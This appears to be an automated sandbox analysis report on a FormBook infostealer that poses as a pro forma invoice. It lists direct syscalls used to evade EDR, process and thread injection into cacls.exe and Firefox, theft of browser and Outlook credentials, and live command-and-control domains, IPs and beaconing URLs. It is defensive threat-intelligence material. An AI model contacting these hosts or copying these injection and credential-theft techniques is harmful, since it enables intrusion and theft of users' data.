                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01776ACC mov eax, dword ptr fs:[00000030h]4_2_01776ACC
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01776ACC mov eax, dword ptr fs:[00000030h]4_2_01776ACC
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01728AA0 mov eax, dword ptr fs:[00000030h]4_2_01728AA0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01728AA0 mov eax, dword ptr fs:[00000030h]4_2_01728AA0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01776AA4 mov eax, dword ptr fs:[00000030h]4_2_01776AA4
                Source: C:\Users\user\Desktop\profroma invoice.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\profroma invoice.exeMemory written: C:\Users\user\Desktop\profroma invoice.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\profroma invoice.exeSection loaded: NULL target: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeSection loaded: NULL target: C:\Windows\SysWOW64\cacls.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\cacls.exeThread register set: target process: 6540Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\cacls.exeThread APC queued: target process: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess created: C:\Users\user\Desktop\profroma invoice.exe "C:\Users\user\Desktop\profroma invoice.exe"Jump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: vEErKBMCpBGs.exe, 00000006.00000000.2719545789.0000000000FA1000.00000002.00000001.00040000.00000000.sdmp, vEErKBMCpBGs.exe, 00000006.00000002.3924832806.0000000000FA1000.00000002.00000001.00040000.00000000.sdmp, vEErKBMCpBGs.exe, 00000008.00000000.2883771207.0000000000FC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: vEErKBMCpBGs.exe, 00000006.00000000.2719545789.0000000000FA1000.00000002.00000001.00040000.00000000.sdmp, vEErKBMCpBGs.exe, 00000006.00000002.3924832806.0000000000FA1000.00000002.00000001.00040000.00000000.sdmp, vEErKBMCpBGs.exe, 00000008.00000000.2883771207.0000000000FC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: vEErKBMCpBGs.exe, 00000006.00000000.2719545789.0000000000FA1000.00000002.00000001.00040000.00000000.sdmp, vEErKBMCpBGs.exe, 00000006.00000002.3924832806.0000000000FA1000.00000002.00000001.00040000.00000000.sdmp, vEErKBMCpBGs.exe, 00000008.00000000.2883771207.0000000000FC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: vEErKBMCpBGs.exe, 00000006.00000000.2719545789.0000000000FA1000.00000002.00000001.00040000.00000000.sdmp, vEErKBMCpBGs.exe, 00000006.00000002.3924832806.0000000000FA1000.00000002.00000001.00040000.00000000.sdmp, vEErKBMCpBGs.exe, 00000008.00000000.2883771207.0000000000FC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\profroma invoice.exeQueries volume information: C:\Users\user\Desktop\profroma invoice.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.profroma invoice.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.profroma invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3924593962.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3924982595.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2811552200.0000000001B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3925053605.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2807926965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2808844558.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\cacls.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.profroma invoice.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.profroma invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3924593962.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3924982595.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2811552200.0000000001B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3925053605.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2807926965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2808844558.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                Services File Permissions Weakness                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Services File Permissions Weakness                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                DLL Side-Loading                		412
                Process Injection                		NTDS2
                File and Directory Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets113
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Services File Permissions Weakness                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                Software Packing                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1575109 Sample: profroma invoice.exe Startdate: 14/12/2024 Architecture: WINDOWS Score: 100 31 www.aktmarket.xyz 2->31 33 www.golivenow.live 2->33 35 9 other IPs or domains 2->35 45 Suricata IDS alerts for network traffic 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 Yara detected FormBook 2->49 53 5 other signatures 2->53 10 profroma invoice.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 31->51 process4 file5 29 C:\Users\user\...\profroma invoice.exe.log, ASCII 10->29 dropped 65 Injects a PE file into a foreign processes 10->65 14 profroma invoice.exe 10->14         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 17 vEErKBMCpBGs.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 cacls.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 vEErKBMCpBGs.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 1hong.pels5zqo.shop 129.226.153.85, 49998, 49999, 50000 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN Singapore 23->37 39 www.christinascuties.net 74.208.236.156, 49876, 80 ONEANDONE-ASBrauerstrasse48DE United States 23->39 41 4 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                profroma invoice.exe29%VirustotalBrowse
                profroma invoice.exe61%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                profroma invoice.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                www.aktmarket.xyz1%VirustotalBrowse
                iglpg.online0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://www.iglpg.online/rbqc/0%Avira URL Cloudsafe
                http://www.1qcczjvh2.autos/pfw9/0%Avira URL Cloudsafe
                http://www.aktmarket.xyz/wb7v/?OVldGJw=IA0aHAKfw1DI7BcY57/RaCO2pXyAG0bIJhioZgrDgtprV+dFeA51d24/BswRkzzY9dVkqa6lP7qo/SE9ZBwNPYotf4JfrOn9OzIPvHr8twMpt9nvqMMqsQkOmIpHnfRVOQ==&OP=QXZPwDNH0BG0ttd00%Avira URL Cloudsafe
                http://www.golivenow.live/r2k9/0%Avira URL Cloudsafe
                http://www.techmiseajour.net/jytl/?OVldGJw=g6hM5OfAy0aZTOdzxy+YHDeawhxh9ZVnbH1D7PSRWxwlxqBVZ/VTfAfjReyEGXu+lurHf7fRU8SuqLFFtve4ErYfnV+9J0MgDDdNAn16OZJz59DY9WPzssUTDurce1bk1g==&OP=QXZPwDNH0BG0ttd00%Avira URL Cloudsafe
                http://www.1qcczjvh2.autos/pfw9/?OVldGJw=45l5W170mEENNSUkva5u0oLDjn7a85Be/JClWAxqTX/Xh+MpzQee3AwDIBzH94Waz7MWeOxtR7oNILZ5PKGZDC0jYAJATZz8bqUDD2VUfBcYMm5ScOmty60G6hY6HDPa2g==&OP=QXZPwDNH0BG0ttd00%Avira URL Cloudsafe
                http://www.christinascuties.net/raea/?OP=QXZPwDNH0BG0ttd0&OVldGJw=PqKj/8KuIq0WSNkJd9VnweLoPwEm47E1M43YI/iJd5qBB0feLv8ZTXGbO6iF0HlQbmuDykhZpdeI6maFWjpp0C3nDuO5nIZe3j/YTX68cDZNSzr/FZo0tHiTVt9ne+/WzA==0%Avira URL Cloudsafe
                http://www.techmiseajour.net/jytl/0%Avira URL Cloudsafe
                http://www.1qcczjvh2.autos0%Avira URL Cloudsafe
                http://www.aktmarket.xyz/wb7v/0%Avira URL Cloudsafe
                http://www.iglpg.online/rbqc/?OVldGJw=3OhzIPQDpE/WyOq7Ap5YzcvodMsyqKhwFHC8VhGgYWlBNCQMRbA04lYXhcibOdGaaYQUE3h/dXM8I7VGN3rlu95wMgHAHM1mSs1zJwZJ5t13zgPyFY5h6K1xMGitp/XiNQ==&OP=QXZPwDNH0BG0ttd00%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.aktmarket.xyz
                		13.248.169.48
                		truetrueunknown
                iglpg.online
                		3.33.130.190
                		truetrueunknown
                1hong.pels5zqo.shop
                		129.226.153.85
                		truetrue
                  		unknown
                  www.christinascuties.net
                  		74.208.236.156
                  		truetrue
                    		unknown
                    techmiseajour.net
                    		84.32.84.32
                    		truetrue
                      		unknown
                      www.golivenow.live
                      		66.29.149.46
                      		truetrue
                        		unknown
                        www.techmiseajour.net
                        		unknown
                        		unknownfalse
                          		unknown
                          www.iglpg.online
                          		unknown
                          		unknownfalse
                            		unknown
                            www.1qcczjvh2.autos
                            		unknown
                            		unknownfalse
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.christinascuties.net/raea/?OP=QXZPwDNH0BG0ttd0&OVldGJw=PqKj/8KuIq0WSNkJd9VnweLoPwEm47E1M43YI/iJd5qBB0feLv8ZTXGbO6iF0HlQbmuDykhZpdeI6maFWjpp0C3nDuO5nIZe3j/YTX68cDZNSzr/FZo0tHiTVt9ne+/WzA==true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.iglpg.online/rbqc/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.golivenow.live/r2k9/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.1qcczjvh2.autos/pfw9/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.techmiseajour.net/jytl/?OVldGJw=g6hM5OfAy0aZTOdzxy+YHDeawhxh9ZVnbH1D7PSRWxwlxqBVZ/VTfAfjReyEGXu+lurHf7fRU8SuqLFFtve4ErYfnV+9J0MgDDdNAn16OZJz59DY9WPzssUTDurce1bk1g==&OP=QXZPwDNH0BG0ttd0true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.aktmarket.xyz/wb7v/?OVldGJw=IA0aHAKfw1DI7BcY57/RaCO2pXyAG0bIJhioZgrDgtprV+dFeA51d24/BswRkzzY9dVkqa6lP7qo/SE9ZBwNPYotf4JfrOn9OzIPvHr8twMpt9nvqMMqsQkOmIpHnfRVOQ==&OP=QXZPwDNH0BG0ttd0true
                              • Avira URL Cloud: safe
                              		unknown
